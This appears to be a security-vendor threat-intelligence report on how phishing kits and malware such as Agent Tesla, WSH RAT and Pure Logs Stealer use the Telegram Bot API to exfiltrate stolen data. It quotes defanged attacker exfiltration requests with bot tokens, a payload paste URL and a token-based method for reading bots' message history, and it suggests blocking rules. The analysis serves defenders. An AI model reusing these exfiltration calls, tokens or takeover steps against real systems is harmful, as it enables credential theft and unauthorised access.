By: Kahng An, Intelligence Team
Telegram is a free, online instant messenger platform that is also commonly abused by threat actors for a wide range of malicious activities. One of Telegram’s notable features is its extensive collection of web APIs, one of which is used to interact with automated bot accounts. Notably, Telegram bot accounts are still capable of posting messages in chats and uploading arbitrary files such as screenshots or archives of stolen information. As such, Telegram bots are often used by threat actors as a method of data exfiltration through a technically legitimate service. This report will provide an overview of how threat actors use the Telegram Bot API, examples of data exfiltration via Telegram bots within both malware and credential phishing samples, and how analysts can query the Telegram API to read bot messages.
Key Takeaways
- Telegram bots can be used as a Command and Control (C2) to exfiltrate data via text messages or arbitrary file uploads. The uploaded files within the analyzed samples usually include screenshots and text files with stolen credentials.
- 3.8% of all malware-based ATRs (Active Threat Reports) from Q1 2024 to Q2 2025 used Telegram as a C2.
- Note that ATRs track unique campaigns and can have multiple email samples that are associated with a singular campaign and its related IOCs (indicators of compromise).
- 2.3% of all credential phishing ATRs from Q1 2024 to Q2 2025 used Telegram as a C2.
- 3.8% of all malware-based ATRs (Active Threat Reports) from Q1 2024 to Q2 2025 used Telegram as a C2.
- Threat investigators and analysts can use the Telegram API to read through bot messages if they can obtain the bot’s authentication token and the ID number for the chat room.
- However, because threat actors need to provide both of those when making Telegram Bot API calls, this is usually trivial.
Telegram Bot API Overview
While Telegram is a commonly used messaging platform, it also provides a robust API for creating various automations via bot accounts. While Telegram intends bot accounts to be mostly for user interaction within a chat group, Telegram bots can be made to send arbitrary messages, upload arbitrary files, and download files from a specified chat group. As such, threat actors can abuse the API to exfiltrate text or file-based information from an infected host and issue further commands via Telegram messages to the bot, effectively using a Telegram group as a C2 server.
Notable Samples
Telegram bots can be used for data exfiltration or communication in a few different ways, and they are commonly used in various malware samples, including Remote Access Trojans (RATs), Keyloggers, and Information Stealers. While the way Telegram bots can be used varies between malware samples, some potential uses include sending scripted payloads to a group for a RAT to execute via a Telegram bot account, and using Keyloggers and Information Stealers to send keyboard inputs or stolen credentials to the threat actor’s Telegram group. In general, Telegram C2s appear to be most popular among Information Stealers, possibly due to Telegram’s technically legitimate nature and because Information Stealers typically only need to exfiltrate data passively rather than provide complex communications beyond simple message or file transfers.
Credential Phishing
The simplest way Telegram bots are utilized is to exfiltrate data from credential phishing forms to a bot created by the threat actor. The following image shows a credential phishing page that will exfiltrate input data via a “sendMessage” API call, which is used to send messages to a specified Telegram bot.
Figure 1: When the credential phishing form is submitted, the data will be exfiltrated via a Telegram bot.
When looking at the exact POST request, an analyst can note that the Telegram bot used to exfiltrate data has the bot ID “8164995813” in this example. The exfiltrated data is sent to chat room ID “6322326407” with the exfiltrated data sent as the message body.
Figure 2: The POST request to the Telegram C2 shows the bot’s ID and authentication token.
Figure 3: The body of the POST request includes the ID for the Telegram chat room to exfiltrate the data to.
Notably, when looking at the POST response confirming that the message was sent via the API, additional information can be found about the Telegram bot, including its display name (“bebetologxxz”), username (“bebetologxxz_bot”), and the name of the chat room where the data was exfiltrated to (“Mr Grace 247”).
Figure 4: The body of the POST response includes further information about the Telegram bot and chat room used to exfiltrate data.
Agent Tesla Keylogger
While Agent Tesla Keylogger is capable of exfiltrating data via a standard HTTP request, email, or FTP, it can also be configured to handle communication via Telegram messages. Typically, this involves using the API to upload files via the “sendDocument” API call, like how a credential phishing page would make a POST request to the “sendMessage” API endpoint. The following shows an example request.
|
hxxps[://]api[.]telegram[.]org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument |
These exfiltrated files are text documents or archives that include stolen credentials aggregated from browser cookies, email clients, and FTP clients. Agent Tesla Keylogger is by far the most prominent example of a malware family that uses Telegram as a C2, with 77.7% of all ATRs in 2024 with a Telegram C2 being an Agent Tesla Keylogger sample.
WSH RAT
While Telegram Bot API requests can be called from malicious files and script payloads, they can also be called within the browser. Some WSH RAT samples have been seen reporting host information to a Telegram C2 as a part of the initial payload download page. The Telegram messages include the infected host’s IP address, geographic region, city, country, and browser user-agent. In these cases, the WSH RAT sample is not responsible for interacting with Telegram APIs at all, and only the initial payload download page includes a Telegram Bot API call. While this use of a Telegram C2 is less common, it is a useful way for threat actors to be notified when a victim has downloaded a file. The following shows a sample POST request and response from this type of Telegram C2 use.
|
Request: POST hxxps[://]api[.]telegram[.]org/bot7004434365:AAGMJLpdyYvb4CDZLQ47zbh0pRB_CC-Hwro/sendMessage {“chat_id”:”7183381859″,”text”:”Your file was downloaded from – Email: <redacted> IP Address: <redacted> Region: <redacted> City: <redacted> Country: United States User-Agent: <redacted>”} |
|
Response: {“ok”:true,”result”:{ “message_id”:667,”from”:{“id”:7004434365,”is_bot”:true,”first_name”:”Downloads_Bot”,”username”:”Downloads39_bot”}, “chat”:{“id”:7183381859,”first_name”:”Crazy”,”last_name”:”Logz”,”username”:”crazylogz”,”type”:”private”}, “date”:1719586975,”text”:”Your file was downloaded from – Email: <redacted> IP Address: <redacted> Region: <redacted> City: <redacted> Country: United States User-Agent: <redacted>”, “entities”:[{“offset”:39,”length”:27,”type”:”email”},{“offset”:79,”length”:13,”type”:”url”}]}} |
Pure Logs Stealer
Some early samples of Pure Logs Stealer associated with the Lone None threat actor use Telegram to exfiltrate stolen credentials and host information via bot messages. However, more recent samples have also creatively used Telegram user profiles as a way of providing second-stage URL payloads for a Telegram bot. The profile page for the bot includes a string that is used as the path for a temporary file hosting service that is used for malicious payloads. The following is an example of one of the Telegram bots used by Lone None to demonstrate how they embed the payload on the page.
Figure 5: An example of a Telegram bot profile used by Lone None to store part of a URL payload.
Typically, this part of the URL payload is then used to load a malicious Python script from paste[.]rs, an online pastebin service. The following is the combined URL payload from the above Telegram snippet.
|
hxxps[://]paste[.]rs/qDTxA |
Investigating Telegram Bot Channels
Due to some interesting quirks of how the Telegram Bot API works, simply having a Telegram bot’s authorization token can provide high-fidelity IOCs for further investigation. The getMe method is intended for testing authorization tokens, but it notably outputs the bot’s username. This can be useful for attributing bots to certain threat actor groups. Even more notably, analysts can query the API to forward historical bot messages from the threat actor’s chat group to one controlled by the analyst using the getUpdates and forwardMessage methods. If the analyst can find the bot’s authorization token and chat ID used by the threat actor, all prior messages sent by the bot can be forwarded to a group controlled by the analyst. However, this is usually trivial because sending API requests requires specifying the bot’s authorization token and the chat room ID to interact with. Looking back at the network communication from the credential phishing example, the POST request includes the authorization token “bot8164995813:AAH85N7GqLCmFV8QF5STNJv92Cv2ZQKpPGk” within the API request. Similarly, the chat room ID can be found within the body of the POST request.
Figure 6: A bot’s authorization token can be found within the POST request URL.
Figure 7: The Telegram chat room that an API request interacts with can be found within the body of the POST request.
Mitigations
Due to its flexibility and ease of use, the Telegram Bot API can be used on virtually any webpage or malicious program capable of making web requests. Some common ways threat actors use the Telegram API include directly making HTTPS requests from executing a malicious script, sending credential phishing form data upon submitting the form, or alerting the threat actor that a victim visited a malicious embedded link payload upon loading the site. In all these cases, the victim would still need to first interact with some kind of malicious infrastructure set up by a threat actor. In other words, the victim would need to have opened some sort of suspect message, embedded link payload, or malicious file. To minimize potential data exposure, users should be trained to avoid and report suspect messages, links, and attachments.
If Telegram bots are not legitimately used within an environment, also consider blocking Telegram Bot API requests, which are all served over “hxxps[://]api[.]telegram[.]org/bot<token>/METHOD_NAME” where “<token>” is the unique bot authentication token and “METHOD_NAME” is the API method. Some commonly used methods include “sendMessage” (used to send text messages), “sendDocument” (used to upload files up to 50 MB in size), and “getFile” (used to download remote files). Another approach would be to create rules for the entire “api[.]telegram[.]org/bot” API endpoint.
As threat actors continue to leverage legitimate platforms like Telegram to quietly exfiltrate stolen credentials and sensitive data, security teams need visibility that goes beyond traditional detection methods. The tactics outlined above highlight how easily attackers can integrate services like the Telegram Bot API into phishing kits, keyloggers, and malware campaigns to streamline command-and-control and data exfiltration. Cofense helps organizations stay ahead of these evolving techniques by delivering actionable threat intelligence, real-time phishing insights, and detailed analysis of the infrastructure and tools adversaries use. Schedule a demo to see how Cofense Intelligence can strengthen your phishing defense strategy and provide the context your team needs to detect and disrupt modern threats: https://cofense.com/demo.
